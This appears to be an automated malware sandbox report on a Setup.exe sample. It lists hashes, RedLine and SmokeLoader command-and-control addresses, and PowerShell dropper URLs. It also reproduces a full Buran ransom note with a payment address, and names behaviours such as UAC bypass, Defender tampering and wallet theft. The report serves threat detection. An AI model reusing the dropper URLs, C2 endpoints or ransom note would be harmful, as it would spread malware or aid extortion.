Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
569s -
max time network
1823s -
platform
windows11_x64 -
resource
win11 -
submitted
27-08-2021 16:31
General
-
Target
Setup.exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://kmsauto.us/ALL.txt
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://kmsauto.us/ra/ALL.txt
Extracted
Path
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family
buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
PAY FAST 500$=0.013 btc
or the price will increase tomorrow
bitcoin address
bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8
To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
[email protected]
TELEGRAM @ payfast290
Your personal ID: 2D4-FBD-19D
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Extracted
Path
C:\Users\Admin\Desktop\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
Family
buran
Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!!
All your files, documents, photos, databases and other important files are encrypted.
You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
PAY FAST 500$=0.013 btc
or the price will increase tomorrow
bitcoin address
bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8
To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free.
But this file should be of not valuable!
Do you really want to restore your files?
[email protected]
TELEGRAM @ payfast290
Your personal ID: 289-E6B-30F
Attention!
* Do not rename encrypted files.
* Do not try to decrypt your data using third party software, it may cause permanent data loss.
* Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
Extracted
Family
redline
Botnet
supertraff
C2
135.148.139.222:1494
Extracted
Family
redline
Botnet
27.08
C2
95.181.172.100:55640
Extracted
Family
redline
Botnet
dibild2
C2
135.148.139.222:1494
Extracted
Family
smokeloader
Version
2020
C2
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
rc4.i32
rc4.i32
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 24 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
UAC bypass 3 TTPs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
-
Blocklisted process makes network request 15 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 5 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 11 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Suspicious use of SetThreadContext 64 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 62 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 56 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 43 IoCs
-
Modifies registry class 1 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe"C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 284⤵
- Program crash
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Windows security modification
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks BIOS information in registry
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7264 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1300 -s 284⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7912 -s 284⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
C:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exeC:\Users\Admin\Documents\6dhUUwCP6tPiAlc2CrtbXtjY.exe3⤵
-
-
